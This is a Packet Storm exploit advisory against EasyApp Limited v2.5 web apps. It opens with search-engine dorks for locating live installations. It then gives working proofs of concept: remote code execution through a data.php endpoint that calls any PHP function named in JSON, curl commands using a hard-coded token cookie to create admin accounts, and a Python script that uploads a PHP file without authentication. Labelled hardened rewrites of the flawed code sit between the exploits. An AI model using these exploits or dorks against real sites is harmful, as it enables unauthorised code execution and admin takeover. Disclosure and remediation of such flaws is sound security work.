EasyApp Limited 2.5 Remote Code Execution / Deserialization / File Upload

22 Aug 2025, reported by bRpsd. Type: packetstorm. Source: packetstorm.news

EasyApp Limited v2.5: remote code execution via object deserialization and file upload.

Code
# Exploit Title: EasyApp Limited - Multiple Vulnerabilities
    # Date: 2025-06-27
    # Exploit Author: bRpsd -> cy[at]live.no
    # Vendor Homepage: https://easyapp.com.hk/
    # Products: Easy Shop, Easy Food, Handlebook
    # Affected Versions: v2.5 and below
    # CVE: N/A
    # Tested on: localhost xampp, MacOS
    # Dorks:
    "Powered By Easyapp © 2025"
    Powered By EasyApp Limited inurl:app/web
    "Powered By EasyApp Limited"
    "DESIGN BY HANDLEBOOK EDUCATION SOLUTIONS © 2025"
    "EasyApp Login"
    inurl:/web/product_detail.php?linkid=
    inurl:app/admin2/login.php
    inurl:app/#!/template/newsList.php
    
    
    
    
    ##########################################################################################
    Vulnerability: PHP Object Injection "CWE-502: Deserialization of Untrusted Data"
    The script decodes the JSON body read from php://input without any validation and then calls the function named in "action" with the value of "data" as its argument. No authentication is required, so any PHP function (for example system()) can be invoked by an anonymous request, which gives unauthenticated remote code execution.
    File: /app/php/data.php
    
    Code:
    =================================================================================
    	$path = $_SERVER['DOCUMENT_ROOT'];
    	include_once($path);
    	$json = json_decode(file_get_contents("php://input"),true) ; 
    	// Calling Custom Function
    	echo json_encode($json["action"]($json["data"]));
    =================================================================================
    
    
    
    POC:
    ==========================================================================================
    POST https://localhost/app/php/data.php HTTP/1.1
    host: localhost
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:142.0) Gecko/20100101 Firefox/142.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: en-US,en;q=0.5
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    content-length: 35
    Connection: keep-alive
    Cookie: _ga_RRH2QH5VDJ=GS2.1.s1755785674$o1$g1$t1755785674$j60$l0$h0; _ga=GA1.1.1404825214.1755785674
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    
    {"action":"system","data":"whoami"}
    
    
    Response:
    HTTP/1.1 200 OK
    Date: Thu, 15 Aug 2025 14:19:26 GMT
    Content-Type: text/html; charset=UTF-8
    Connection: keep-alive
    
    root
    "root"
    
    
    
    Using CURL:
    curl -X POST https://localhost/app/php/data.php \
    -H "Content-Type: application/json" \
    -d '{"action":"system","data":"uname"}'
    
    "Darwin"
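For comparison, a hardened rewrite of the dispatcher above. This is an added example, not EasyApp's code: the client's "action" string is only ever used as a lookup key into a fixed allow-list, the JSON body is validated before use, and the handler names in the allow-list are assumptions for illustration.

```php
<?php
declare(strict_types=1);

// Hardened replacement for the dispatcher in /app/php/data.php (added
// example, not EasyApp's code). Only names listed in ALLOWED_ACTIONS can
// ever be called; the handler function names are assumptions.
const ALLOWED_ACTIONS = [
    'getProductDetail' => 'app_get_product_detail',
    'getNewsList'      => 'app_get_news_list',
];

header('Content-Type: application/json; charset=UTF-8');

function fail(int $status, string $message): void
{
    http_response_code($status);
    echo json_encode(['status' => 'ERROR', 'message' => $message]);
    exit;
}

$raw = file_get_contents('php://input');
if ($raw === false || strlen($raw) > 65536) {
    fail(400, 'invalid request body');
}

try {
    // Bounded nesting depth and exceptions instead of silent null on bad input.
    $json = json_decode($raw, true, 16, JSON_THROW_ON_ERROR);
} catch (JsonException $e) {
    fail(400, 'malformed JSON');
}

// "action" must be a string that is a key of the allow-list. The client's
// value selects an entry; it is never itself used as a function name, so
// "system", "exec", "passthru" and friends are unreachable.
if (!is_array($json) || !isset($json['action']) || !is_string($json['action'])
    || !array_key_exists($json['action'], ALLOWED_ACTIONS)) {
    fail(400, 'unknown action');
}

$data = $json['data'] ?? [];
if (!is_array($data)) {
    fail(400, '"data" must be a JSON object');
}

$handler = ALLOWED_ACTIONS[$json['action']];
if (!function_exists($handler)) {
    fail(500, 'handler not available');
}

echo json_encode($handler($data));
```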
    
    
    
    
    ##########################################################################################
    Vulnerability 2: Static Token Bypass (CWE-798: Use of Hard-coded Credentials) 
    File: /app/admin2/php/data.php
    Code:
    =================================================================================
    function getAppAccessRight($functionName,$param)
        {
            $data = array();
    		$data["status"] = "SUCCESS" ; 
            $uid = $_COOKIE["uid"] ; 
            $token = $_COOKIE["token"] ; 
            $escapeFunction = ESCAPE_FUNC_TOKEN ; 
            // echo $functionName . "<br/>";
            // echo $escapeFunction . "<br/>";
            if (strpos($escapeFunction, $functionName) !==false)
                return $data ; 
    		if ($token == "abcdefghijklmnopqrstuvwxyz1234567890")
    			return $data ; 
    =================================================================================
    
    
    This means the access check protecting the admin functions in /app/admin2/php/data.php can be bypassed trivially: any request that carries the hard-coded value in the token cookie can call createAdmin, updateAdmin and many other admin-only functions directly:
    
    POC:
    ==========================================================================================
    curl -X POST \
      'https://localhost/app/admin2/php/data.php' \
      -H 'Cookie: token=abcdefghijklmnopqrstuvwxyz1234567890; blogin=true; uid=1; logined=true; token=true' \
      -H 'Content-Type: application/json' \
      -d '{
        "action": "updateAdmin",
        "data": {
          "fullname": "X",
          "loginid": "XXXXXXXXXX",
          "pwd": "XXXXXXXXXX",
          "email": "[email protected]",
          "role": "ADMIN",
          "userid": "1",
          "imgattachid": "1"
        }
      }'
      
    Response:
      {"uid":"UID_HERE","status":"SUCCESS"}
    			
    			
    curl -X POST \
      'https://localhost/app/admin2/php/data.php' \
      -H 'Cookie: token=abcdefghijklmnopqrstuvwxyz1234567890; blogin=true; uid=1; logined=true; token=true' \
      -H 'Content-Type: application/json' \
      -d '{
        "action": "createAdmin",
        "data": {
          "fullname": "X",
          "loginid": "X",
          "pwd": "X",
          "email": "[email protected]",
          "role": "ADMIN",
          "userid": "1",
          "imgattachid": "1"
        }
      }'
    Response:
      {"uid":"UID_HERE","status":"SUCCESS"}
    ==========================================================================================
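A hardened version of getAppAccessRight(), added here as an example and not taken from EasyApp's code. It removes the static token branch, replaces the strpos() substring test on ESCAPE_FUNC_TOKEN with an exact-match list (so a name that merely contains a public function's name is not exempted), and compares the cookie token in constant time against a per-user hash stored server-side. The PDO connection and the admin_session table are assumptions.

```php
<?php
declare(strict_types=1);

// Hardened replacement for getAppAccessRight() in /app/admin2/php/data.php
// (added example, not EasyApp's code). The $db connection and the
// admin_session table (uid, token_hash, expires_at) are assumptions.

// Functions callable without a login: exact names, not substrings, so that
// "loginAdmin" is not accepted merely because "login" is listed.
const PUBLIC_FUNCTIONS = ['login', 'forgotPassword'];

function getAppAccessRight(PDO $db, string $functionName, array $param): array
{
    if (in_array($functionName, PUBLIC_FUNCTIONS, true)) {
        return ['status' => 'SUCCESS'];
    }

    // Both values come from cookies; validate their shape before any lookup.
    $uid   = $_COOKIE['uid']   ?? '';
    $token = $_COOKIE['token'] ?? '';
    if (!ctype_digit($uid) || strlen($token) !== 64 || !ctype_xdigit($token)) {
        return ['status' => 'FAIL', 'message' => 'not authenticated'];
    }

    // The session token itself is never stored; only its SHA-256 hash is.
    $stmt = $db->prepare(
        'SELECT token_hash, expires_at FROM admin_session WHERE uid = :uid'
    );
    $stmt->execute([':uid' => (int) $uid]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false || strtotime($row['expires_at']) < time()) {
        return ['status' => 'FAIL', 'message' => 'not authenticated'];
    }

    // Constant-time comparison: there is no fixed value that passes, and the
    // check does not leak how many leading bytes matched.
    if (!hash_equals($row['token_hash'], hash('sha256', $token))) {
        return ['status' => 'FAIL', 'message' => 'not authenticated'];
    }

    return ['status' => 'SUCCESS', 'uid' => (int) $uid];
}
```

The token cookie should additionally be issued with the HttpOnly, Secure and SameSite attributes, and callers must check status before running the requested admin function.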
    
    
    
    
    
    ##########################################################################################
    Vulnerability: Unauthenticated Arbitrary File UPLOAD,DELETE & Exposure
    path: app/admin2/userimg
    
    Requesting the directory /app/admin2/userimg/ directly returns the list of files uploaded to it, including a deleteUrl for each file:
    
    Example:
    {"files":[{"name":"x.jpg","size":4,"url":"https:\/\/localhost\/app\/admin2\/userimg\/files\/x.jpg","deleteUrl":"https:\/\/localhost.hk\/app\/admin2\/userimg\/index2.php?file=x.jpg","deleteType":"DELETE"}]}
    
    Upload and delete requests can be sent directly to the same endpoint without any authentication.
    
    Python Code for uploading a test.php:
    ==========================================================================================
    import requests
    # Define the URL and headers
    url = "https://localhost/app/admin2/userimg/"
    headers = {
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:141.0) Gecko/20100101 Firefox/141.0",
        "Accept": "application/json, text/javascript, */*; q=0.01",
        "Accept-Language": "en-US,en;q=0.5",
        "Accept-Encoding": "gzip, deflate, br, zstd",
        "X-Requested-With": "XMLHttpRequest",
        "Origin": "https://localhost/",
        "Connection": "keep-alive",
        "Referer": "https://localhost/app/admin2/news-list-add.php",
        "Sec-Fetch-Dest": "empty",
        "Sec-Fetch-Mode": "cors",
        "Sec-Fetch-Site": "same-origin"
    }
    
    # Payload to accept file (some settings allow direct PHP upload, others don't)
    payload = {
        'attachid': '1',
        'gtitle_zh': '1',
        'linkid': '1'
    }
    
    files = {
        'files[]': ('x.PhP', 'test', 'multipart/form-data')
    }
    
    response = requests.post(url, headers=headers, data=payload, files=files)
    
    # Print the response
    print(f"Status Code: {response.status_code}")
    print("Response Text:", response.text)
    ==========================================================================================
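The upload handler, rewritten with the controls whose absence the request above exploits. This is an added example, not EasyApp's code: it requires an admin session, decides the file type from the content rather than from the client-supplied name or Content-Type, and stores the file under a server-chosen random name. requireAdminSession() and the files/ directory are assumptions.

```php
<?php
declare(strict_types=1);

// Hardened upload handler for /app/admin2/userimg/ (added example, not
// EasyApp's code). requireAdminSession() and the files/ layout are assumed.

requireAdminSession();   // assumed: aborts the request unless a valid admin session exists

// Type is decided from the file content and mapped to an extension we choose.
const ALLOWED_TYPES = ['image/jpeg' => 'jpg', 'image/png' => 'png', 'image/gif' => 'gif'];
const MAX_BYTES = 2 * 1024 * 1024;

function reject(int $status, string $msg): void
{
    http_response_code($status);
    header('Content-Type: application/json');
    echo json_encode(['error' => $msg]);
    exit;
}

// The form field is files[], so PHP exposes per-file arrays under 'files'.
$tmp = $_FILES['files']['tmp_name'][0] ?? null;
$err = $_FILES['files']['error'][0] ?? UPLOAD_ERR_NO_FILE;
if ($tmp === null || $err !== UPLOAD_ERR_OK || !is_uploaded_file($tmp)) {
    reject(400, 'no file uploaded');
}
if (filesize($tmp) > MAX_BYTES) {
    reject(413, 'file too large');
}

// Sniff the MIME type from the bytes; the client-supplied name ("x.PhP")
// and Content-Type are never consulted.
$mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmp);
if (!isset(ALLOWED_TYPES[$mime]) || getimagesize($tmp) === false) {
    reject(415, 'only JPEG, PNG or GIF images are accepted');
}

// Random server-chosen name and extension: nothing from the request can
// put an executable extension or a path component on the filesystem.
$name = bin2hex(random_bytes(16)) . '.' . ALLOWED_TYPES[$mime];
$dest = __DIR__ . '/files/' . $name;
if (!move_uploaded_file($tmp, $dest)) {
    reject(500, 'could not store file');
}
chmod($dest, 0644);

header('Content-Type: application/json');
echo json_encode(['files' => [['name' => $name, 'size' => filesize($dest)]]]);
```

Serve the files/ directory with script execution and listing disabled (Apache: `php_flag engine off` and `Options -Indexes` for that directory), and apply the same session requirement to the delete endpoint (index2.php).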
    
    
    
    Too lazy to list the OTHER weakness points such as:
    1- Access to the admin area [/app/admin2/] is enforced by an HTML/JavaScript redirect instead of a server-side PHP check, so anyone can load the admin dashboard, read its HTML source and tamper with it.
    
    2- Client IP addresses are taken from the HTTP_CLIENT_IP or HTTP_X_FORWARDED_FOR headers and used for authentication decisions; both headers are client-controlled and can be spoofed.
    
    3- Weak cryptography.
    
    4- No CSRF, XSS or SQLi controls.
    
    5- Improper control of code generation, e.g. using "strpos($escapeFunction, $functionName)" instead of "strpos($functionName, $escapeFunction)", and "TRUE" misspelled as "TURE" in the 2FA activation code.
    
    6- Accessible test files in paths like /app/admin2/testFn.php [Arbitrary File Upload], along with other vulnerable endpoints.
